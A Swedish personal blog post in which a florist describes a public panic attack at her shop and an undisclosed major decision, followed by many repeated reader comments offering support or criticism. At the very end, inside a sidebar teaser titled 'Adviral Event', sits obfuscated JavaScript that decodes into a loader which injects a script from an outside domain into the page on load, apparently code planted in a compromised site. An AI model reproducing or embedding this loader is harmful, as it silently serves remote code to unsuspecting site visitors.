Jag har bestämt mig…..

IMG_7177

Jag har bestämt mig. Efter veckor av ångest så har jag äntligen tagit mitt beslut.

PÅ bilden ser du en rödgråten och svullen My. Jag känner mig trött, ledsen, sliten… Men framförallt så känner jag mig tom. Helt tom.

 Jag skulle bara vilja dra täcket över huvudet och vänta på att stormen ska blåsa över. Men det går ju inte….. Det är bara jag som kan ta kontrollen över mitt liv och min framtid. 

 Min panikångest är i fysisk form det absolut VÄRSTA jag varit med om! Och då min vän ska du veta att jag har varit med om en hel del. saker jag inte önskar min värsta ovän ska behöva uppleva! 

Detta beslutet  jag våndats med under en riktig mardröms period ska jag kunna stå för HELA mitt liv. Det berör inte bara mig. jag måste gå igenom ALLA konsekvenserna och påföljderna. Vad händer om jag väljer den vägen… Vad händer om jag väljer den andra. Hur påverkar det Ludvig. Hur påverkar det mig. 

Jag kör på just nu, i ett farligt högt tempo. Jag VET. Men snart är jag framme. Jag har satt upp både mål och delmål. Jag tar hjälp av psykolog för att hantera min panikångest.

 Förutom det så har jag har i snitt haft ca 15-25 samtal /per dag gällande detta, med rådgivare och inblandade parter, Samtidigt som jag med ett ”leende på läpparna” försöker att hålla ställningen i butiken tillsammans med mina tjejer. 

Jag vänder just nu ut och in på mig själv för att göra det bästa möjliga av situationen. Jag anstränger mig så mycket, och är så fullt fokuserad på att klara av detta just nu att det inte finns någon tid för andrum! Det kommer du snart att förstå varför……… Denna situationen är inte mänsklig! Jag är nere i ett svart hål! 

 Förutom detta så har vi just nu Lager-rensing i butiken, Mys Blommor. 70% på ALLT! Detta innebär sjukt mycket folk. Fullt ös från morgon till kväll. Jag är i butiken mellan ca 07:30- 20-21:00. Igår mitt på dagen, så bröt jag ihop. Jag tappade kontrollen.

Jag hade ca 30 meter kö. Yes, 30 METER kö.  En vänlig bloggläsare som inte var ifrån orten kom fram och gav mig en sak. Mycket omtänksamt.  När kvinnan gått och jag hjälpt och expedierat några kunder till så slog det till…. från ingenstans.

Det knöts sig i bröstet. Jag  jag kunde inte höra vad kunden framför mig pratade om, jag såg att hennes läppar rörde på sig, men jag kunde inte ta in vad hon sa.  Allt ljud blev bara ett såll. 

Jag blev yr och kände att jag tappade kontrollen. Jag kände hur andningen gick från normal, till hyperventileringsläge. Jag försökte behålla kornollen….  Framför mig stod ca 100 människor, nya kunder, gamla kunder, många bekanta ansikten. en del okända. en del bloggläsare. All uppmärksamhet riktades emot mig.  Jag kunde inte hejda det, tårarna började rinna okontrollerat.

Jag ropade på mina kollegor på våran interna kom-radio. Blev avlöst och lyckades tränga mig igenom alla människor. Mitt på dagen , mitt i min egna butik, rusade jag ut genom hela butiken till fika rummet vidare in på toaletten.  Föll ihop i en hög. Skakade, grät, och kräktes. Av ren och skär jävla ångest. Känslan av att inte veta vart man ska ta vägen. –Varför kan man inte kontrollera sina egna känslor? Varför????

Jag vet att detta är ohållbart. jag vet att jag inte kan fortsätta som jag gör. Det kommer jag heller inte att göra. Jag ska ta x-antal kliv tillbaka.

Men just nu, fullt fokus, en sak i taget. Ett delmål i taget. Jag har bestämt mig, jag har tagit mitt beslut  och du ska få veta. Jag ska först genomföra, det som behöver genomföras. Sen ska jag informera mina nära och kära. Sen ska du få veta. 

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

 

Nu morgonmöte med personalen…… Kram / My Martens 

79 Komentarer

 1. Men stackars dig, vad jag lider med dig!! Vilken jobbig situation i butiken ? Och du lever med detta, bär med dig allt det jobbiga dygnet runt…. inte konstigt att det väller över dig när du minst anar det! Vill bara krama om dig och säga att allt ordnar sig, någon gång, på något sätt, du är på god väg

 2. Skickar dig en stor kram trots att jag inte alls känner dig el, kommenterat tidigare. Jag själv har lidit av ångest och depression så jag kan relatera en del av hur du mår. Du verkar få, o ha, ett bra stöd av psykolog. Det var för mig nästan livsavgörande.
  Jag blir så upprörd av alla elaka och osympatiska kommentarer du får av endel. Att sparka på någon som redan ligger tycks vara ett genomgående tema av vissa o det är avskyvärt! Jag hoppas du kan försöka att inte ta åt dig av dessa utan fokuserar på bara dig, ditt eget välmående o din fina son.
  Stor kram❤️

 3. My…jag vet precis hur du känner. Jag själv har stått i denna vägkorsning 2 gånger tidigare i livet. Det gör ont men efter ett tag när värsta cirkus är över så får man lugn och ro. Man kommer tillbaka, tro mig och så länge man har människor runt sig som bryr sig av hjärta och inte girighet så finns det värme. Jag pratar med din Pappa flera gånger i veckan…även han lider men har hoppet för man vill alltid sina barn det bästa. Du kommer vinna det vet jag och behöver du stöd så har du det bland folk som är närmre dig än du tror.

 4. Det knyter sig i min mage av att läsa att en så ung, fin och framgångsrik kvinna går igenom detta. Önskar dig all lycka och att du snart ser ljuset för det kommer att komma.

 5. My… Nå begynte tårene å renne nedover mitt kinn.. Kjenner med deg.. Håper du får den hjelp du trenger. Omsider vil du stå støtt på dine ben. Takk for at du viser din sårbarhet og bilder uten makeup. Vil jeg gi deg en varm og stor klem ❤️
  Ønsker deg alt godt, My
  Hilsen norske Mira

 6. Tänk att man kan lida med någon som man inte känner. Skönt för dig att du kommit till ett beslut så att du kan börja gå vidare. Ta den tid du behöver för dig och din lilla pojk nu. Många styrke kramar.

 7. Men stackars dig, vad jag lider med dig!! Vilken jobbig situation i butiken 🙁 Och du lever med detta, bär med dig allt det jobbiga dygnet runt…. inte konstigt att det väller över dig när du minst anar det! Vill bara krama om dig och säga att allt ordnar sig, någon gång, på något sätt, du är på god väg

 8. Skickar dig en stor kram trots att jag inte alls känner dig el, kommenterat tidigare. Jag själv har lidit av ångest och depression så jag kan relatera en del av hur du mår. Du verkar få, o ha, ett bra stöd av psykolog. Det var för mig nästan livsavgörande.
  Jag blir så upprörd av alla elaka och osympatiska kommentarer du får av endel. Att sparka på någon som redan ligger tycks vara ett genomgående tema av vissa o det är avskyvärt! Jag hoppas du kan försöka att inte ta åt dig av dessa utan fokuserar på bara dig, ditt eget välmående o din fina son.
  Stor kram❤️

 9. My…jag vet precis hur du känner. Jag själv har stått i denna vägkorsning 2 gånger tidigare i livet. Det gör ont men efter ett tag när värsta cirkus är över så får man lugn och ro. Man kommer tillbaka, tro mig och så länge man har människor runt sig som bryr sig av hjärta och inte girighet så finns det värme. Jag pratar med din Pappa flera gånger i veckan…även han lider men har hoppet för man vill alltid sina barn det bästa. Du kommer vinna det vet jag och behöver du stöd så har du det bland folk som är närmre dig än du tror.

 10. Min son och svärdotter har skrivit låten Break Take Live som just handlar om att bryta av och ta kontroll och leva sitt liv. Inte efter andras åsikter utan sina egna. Låten skriven efter egna erfarenheter. Lyssna och få lite styrka ❤️ Önskar dig och de dina allt gott!
  https://m.youtube.com/watch?v=r_6gFdC4Rm4

 11. Men fina My, så hemskt att höra hur dåligt du mår men så skönt att läsa att du kommit fram till ett beslut. Vad härligt det måste kännas ändå, att komma fram till ett beslut, äntligen. Men jag förstår att det kommer att vara svårt, du har byggt upp allt, skapat det från grunden… men jag tror att det beslut du tar är det som är bra för dig, i längden, i framtiden och det kommer att lösa sig, jag lovar. För du har vänt och vridit på det ordentligt nu och därför vet jag att du tar rätt beslut. <3 All styrka till dig idag för det kommer du att behöva. <3

 12. Det knyter sig i min mage av att läsa att en så ung, fin och framgångsrik kvinna går igenom detta. Önskar dig all lycka och att du snart ser ljuset för det kommer att komma.

 13. My… Nå begynte tårene å renne nedover mitt kinn.. Kjenner med deg.. Håper du får den hjelp du trenger. Omsider vil du stå støtt på dine ben. Takk for at du viser din sårbarhet og bilder uten makeup. Vil jeg gi deg en varm og stor klem ❤️

  Ønsker deg alt godt, My

  Hilsen norske Mira

 14. Tänk att man kan lida med någon som man inte känner. Skönt för dig att du kommit till ett beslut så att du kan börja gå vidare. Ta den tid du behöver för dig och din lilla pojk nu. Många styrke kramar.

 15. Stor kram till dig My. Ta en dag i taget. Andas och försök att ta det lugnt. Livet är tufft, det går upp och ner men det blir bättre <3

 16. Ohållbart i längden hur du har det så skönt att du nu har bestämt dig. Gott att du har psykolog så du har stöd i att forma livsstrategier för att ta dig igenom och ut ur denna tuffa stormens öga. Kram ❤️

 17. Vad det än är för beslut du tvingats ta brukar det kännas bättre och till och med skönt när man väl bestämt sig. Du har säkert fattat ett beslut som är det rätta för dig o Ludvig just nu. Vad som händer i framtiden kan ingen veta. Nu kan du landa i ditt beslut och börja ”jobba” därifrån. En timme, en dag, en vecka i taget. Så brukar jag tänka när det är jobbigt. Hoppas det hjälper dig också, du kommer att klara det! Du har Ludvig och ni är friska (förutom panikångesten, som i sig är superjobbig förstås). Kram och lycka till!

 18. Men fina My, så hemskt att höra hur dåligt du mår men så skönt att läsa att du kommit fram till ett beslut. Vad härligt det måste kännas ändå, att komma fram till ett beslut, äntligen. Men jag förstår att det kommer att vara svårt, du har byggt upp allt, skapat det från grunden… men jag tror att det beslut du tar är det som är bra för dig, i längden, i framtiden och det kommer att lösa sig, jag lovar. För du har vänt och vridit på det ordentligt nu och därför vet jag att du tar rätt beslut. <3 All styrka till dig idag för det kommer du att behöva. <3

 19. Stor kram till dig My. Ta en dag i taget. Andas och försök att ta det lugnt. Livet är tufft, det går upp och ner men det blir bättre <3

 20. Ohållbart i längden hur du har det så skönt att du nu har bestämt dig. Gott att du har psykolog så du har stöd i att forma livsstrategier för att ta dig igenom och ut ur denna tuffa stormens öga. Kram ❤️

 21. Blir alldeles chockad hur människor tror att de äger ditt privatliv bara för att du råkar ha en blogg…
  You go girl!
  Men…vad jag ville säga….
  Du har tagit ett beslut!
  Alla problem i livet…..ordnar sig på ett eller annat sätt. Ibland till det bättre…ibland till det sämre…
  Men huvudsaken är att de försvinner….och att ta beslut är steg nummer ETT!
  Det är ovissheten som äter oss människor!!!
  Den lämnar du nu!!!
  Sedan kommer det du gått igenom vara historia…
  Kanske inte den bästa historian….men oavsett historia…
  För varje ”dörr” man stänger i livet… för varje ”rum” man lämnar….
  Så går man faktiskt in i nåt nytt!!!
  Nya erfarenheter!
  Och väldigt, väldigt sällan i livet….
  Önskar man att man kunde backa bandet några år…
  Oftast så vill man vara just i detta ”nu” med den verklighet den innebär.
  För så är vi funtade…
  Vi känner oss trygga när vi vet vad vi har….
  Stort lycka till!
  Ps! Första gången i mitt liv jag kommenterar en blogg…trots idogt läsande i flera år. ?
  Kram! ♡

  • Håller verkligen med dig, folk här verkar verkligen tro att de äger My.
   Styrka till dig My. Du är en klok och en mycket stabil människa, väldigt vacker och ung, det kommer att bli bättre när du kan se ljuset i tunneln.

 22. Oavsett vad du bestämt dig för My önskar jag dig all lycka. Jag har också haft mitt helvete, valde jag rätt?? Skit samma har tre vuxna barn som klarar sig bra i livet. Själv ja, jag reder mig. Mitt fokus är på barn och barnbarn . All lycka till dig. Kan inte säga att jag förstår vad just du går igenom, kan bara hänvisa till vad jag gått igenom. Men du det går att övervinna, jag har fixat det även om jag önskar att jag inte behövt. Kram

 23. Vad det än är för beslut du tvingats ta brukar det kännas bättre och till och med skönt när man väl bestämt sig. Du har säkert fattat ett beslut som är det rätta för dig o Ludvig just nu. Vad som händer i framtiden kan ingen veta. Nu kan du landa i ditt beslut och börja ”jobba” därifrån. En timme, en dag, en vecka i taget. Så brukar jag tänka när det är jobbigt. Hoppas det hjälper dig också, du kommer att klara det! Du har Ludvig och ni är friska (förutom panikångesten, som i sig är superjobbig förstås). Kram och lycka till!

 24. Blir alldeles chockad hur människor tror att de äger ditt privatliv bara för att du råkar ha en blogg…

  You go girl!

  Men…vad jag ville säga….

  Du har tagit ett beslut!
  Alla problem i livet…..ordnar sig på ett eller annat sätt. Ibland till det bättre…ibland till det sämre…
  Men huvudsaken är att de försvinner….och att ta beslut är steg nummer ETT!
  Det är ovissheten som äter oss människor!!!
  Den lämnar du nu!!!
  Sedan kommer det du gått igenom vara historia…
  Kanske inte den bästa historian….men oavsett historia…

  För varje ”dörr” man stänger i livet… för varje ”rum” man lämnar….
  Så går man faktiskt in i nåt nytt!!!
  Nya erfarenheter!

  Och väldigt, väldigt sällan i livet….
  Önskar man att man kunde backa bandet några år…
  Oftast så vill man vara just i detta ”nu” med den verklighet den innebär.
  För så är vi funtade…
  Vi känner oss trygga när vi vet vad vi har….

  Stort lycka till!

  Ps! Första gången i mitt liv jag kommenterar en blogg…trots idogt läsande i flera år. 🙂

  Kram! ♡

  • Håller verkligen med dig, folk här verkar verkligen tro att de äger My.

   Styrka till dig My. Du är en klok och en mycket stabil människa, väldigt vacker och ung, det kommer att bli bättre när du kan se ljuset i tunneln.

 25. Oavsett vad du bestämt dig för My önskar jag dig all lycka. Jag har också haft mitt helvete, valde jag rätt?? Skit samma har tre vuxna barn som klarar sig bra i livet. Själv ja, jag reder mig. Mitt fokus är på barn och barnbarn . All lycka till dig. Kan inte säga att jag förstår vad just du går igenom, kan bara hänvisa till vad jag gått igenom. Men du det går att övervinna, jag har fixat det även om jag önskar att jag inte behövt. Kram

 26. Förlåt om jag skriver det här. Jag brukar inte vara den som lägger mig i och skriver aldrig saker som kan såra. Det här kanske kan uppfattas som det ändå. Jag vet inte. Jag känner inte dig, är inte så ofta inne på din blogg, några ggr har jag varit inne och skummat igenom det du skrivit. Vet verkligen inte mycket. Jag har levt länge, jag har haft ett rent helvete, jag har varit nere i det bottensvarta hålet utan botten, försökt tagit mig upp men gång på gång rasat ner pga yttre orsaker. Vad jag inte förstår i ditt fall är vad det är som är så otroligt svårt, jag kan inte greppa det. Du har en son, du har en blomsteraffär du går runt på, du bloggar och går på röda mattan. Springer i vimmel med kändisar. Panikångest, om det är den, så förstår jag att du har problem men förövrigt. Jag förstår inte. Du måste ta beslut. Varför? Måste man ta beslut när det gäller sina egna projekt? Ja, sälja affären för att blogga på heltid. Kan inte vara så svårt att det knäcker dig. Sälj inte. Lev på affären och blogga på kvartstid. Är det att försvinna ur rampljuset. Det är väl ändå ingen förlust. Handlar det om andra saker som man inte alls vet om. Ja, då kanske det är något. Nu kommer jag få så mycket skit av folk här men det tar jag. Jag vill bara försöka förstå dig, och ditt problem. Du bloggar och som läsare kanske man vill försöka hjälpa. Man försöker förstå. Man börjar spekulera. Så är det. Är det inte i min värld värre än att antingen affär eller blogg, då skulle jag storskita i bloggen. Den kommer du inte leva på när du blir 50 + iallafall. Ingen är intresserad då. Det är det ytliga livet.
  Jag kan bara säga en sak. Tänk på att du ska kunna försörja dig ett helt liv. Du har ett barn som ska vara ditt alternativ nr 1. 2 och 3.
  Det finns kanske inte ett skimrande ljus i tunneln men det finns åtminstone en mörkgrå massa och inte svart.

  • Jag förstår inte heller. Men jag tänker att ibland så blir man liksom uppslukad av sitt problem och då känns de4 så stort och nära. Och hjärtat gråter och så måste det vara ….. liksom…. livet faller över en. Allt som kommer för nära blir för stort. Och det mesta som känns som alldeles för stort är ganska vanligt. Men jag önskar dig allt gott.

 27. Förlåt om jag skriver det här. Jag brukar inte vara den som lägger mig i och skriver aldrig saker som kan såra. Det här kanske kan uppfattas som det ändå. Jag vet inte. Jag känner inte dig, är inte så ofta inne på din blogg, några ggr har jag varit inne och skummat igenom det du skrivit. Vet verkligen inte mycket. Jag har levt länge, jag har haft ett rent helvete, jag har varit nere i det bottensvarta hålet utan botten, försökt tagit mig upp men gång på gång rasat ner pga yttre orsaker. Vad jag inte förstår i ditt fall är vad det är som är så otroligt svårt, jag kan inte greppa det. Du har en son, du har en blomsteraffär du går runt på, du bloggar och går på röda mattan. Springer i vimmel med kändisar. Panikångest, om det är den, så förstår jag att du har problem men förövrigt. Jag förstår inte. Du måste ta beslut. Varför? Måste man ta beslut när det gäller sina egna projekt? Ja, sälja affären för att blogga på heltid. Kan inte vara så svårt att det knäcker dig. Sälj inte. Lev på affären och blogga på kvartstid. Är det att försvinna ur rampljuset. Det är väl ändå ingen förlust. Handlar det om andra saker som man inte alls vet om. Ja, då kanske det är något. Nu kommer jag få så mycket skit av folk här men det tar jag. Jag vill bara försöka förstå dig, och ditt problem. Du bloggar och som läsare kanske man vill försöka hjälpa. Man försöker förstå. Man börjar spekulera. Så är det. Är det inte i min värld värre än att antingen affär eller blogg, då skulle jag storskita i bloggen. Den kommer du inte leva på när du blir 50 + iallafall. Ingen är intresserad då. Det är det ytliga livet.
  Jag kan bara säga en sak. Tänk på att du ska kunna försörja dig ett helt liv. Du har ett barn som ska vara ditt alternativ nr 1. 2 och 3.
  Det finns kanske inte ett skimrande ljus i tunneln men det finns åtminstone en mörkgrå massa och inte svart.

  • Jag förstår inte heller. Men jag tänker att ibland så blir man liksom uppslukad av sitt problem och då känns de4 så stort och nära. Och hjärtat gråter och så måste det vara ….. liksom…. livet faller över en. Allt som kommer för nära blir för stort. Och det mesta som känns som alldeles för stort är ganska vanligt. Men jag önskar dig allt gott.

 28. Jag önskar dig allt gott My.. Du är en stark kvinna, och kommer att går ut ur detta med en ny insikt och lärdom. Jag har varit med om mkt tuffa saker, man ser det inte just där och då. Det är först när man tagit sig igenom all skit som man reser sig starkare än förut. Jag tror på dig!! Stor kram Anna

 29. Jag önskar dig allt gott My.. Du är en stark kvinna, och kommer att går ut ur detta med en ny insikt och lärdom. Jag har varit med om mkt tuffa saker, man ser det inte just där och då. Det är först när man tagit sig igenom all skit som man reser sig starkare än förut. Jag tror på dig!! Stor kram Anna

 30. Kära My! <3
  Jag vet precis hur du känner dig och hur du mår just nu <3 Kunde lika väl vart mig du skriver om!
  Jag går själv igenom en väldigt tuff period i mitt liv just nu som har gett mig en sån oerhörd panikångest. Dessa attackerna som gör att man inte får någon luft och det känns som att man håller på att bli fullständigt galen tror jag inte att det är många som förstår hur det känns.
  Man måste få uppleva det själv!
  Just nu ser man ingen utväg på problemen och allt känns så mörkt! När ska allt vända? Och när ska man få må bra igen tänker jag hela tiden?
  Har sökt hjälp ett antal ggr dom senaste veckorna men har bara fått lite lugnande tabletter till natten som inte hjälper mig och så har jag blivit uppsatt på väntelista till att få träffa en psykolog i höst.. I höst lixom!?
  Här ska man gå omkring gravid och varken veta ut eller in tydligen!
  Tänker på dig och hoppas att det ordnar sig för dig när ditt beslut är taget och överstökat! <3
  Många stöttningskramar! <3

 31. Kära My! <3
  Jag vet precis hur du känner dig och hur du mår just nu <3 Kunde lika väl vart mig du skriver om!
  Jag går själv igenom en väldigt tuff period i mitt liv just nu som har gett mig en sån oerhörd panikångest. Dessa attackerna som gör att man inte får någon luft och det känns som att man håller på att bli fullständigt galen tror jag inte att det är många som förstår hur det känns.
  Man måste få uppleva det själv!
  Just nu ser man ingen utväg på problemen och allt känns så mörkt! När ska allt vända? Och när ska man få må bra igen tänker jag hela tiden?
  Har sökt hjälp ett antal ggr dom senaste veckorna men har bara fått lite lugnande tabletter till natten som inte hjälper mig och så har jag blivit uppsatt på väntelista till att få träffa en psykolog i höst.. I höst lixom!?
  Här ska man gå omkring gravid och varken veta ut eller in tydligen!
  Tänker på dig och hoppas att det ordnar sig för dig när ditt beslut är taget och överstökat! <3
  Många stöttningskramar! <3

 32. Fina du … Nu är det hög tid för dig att välja var du ska bo och leva … Flacka hit och dit är inget alternativ för dig eller lillemannen !!! Fokusera på er nu … Annars kommer du gå under ! Stooooor kram från Giesela

 33. Fina du … Nu är det hög tid för dig att välja var du ska bo och leva … Flacka hit och dit är inget alternativ för dig eller lillemannen !!! Fokusera på er nu … Annars kommer du gå under ! Stooooor kram från Giesela

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/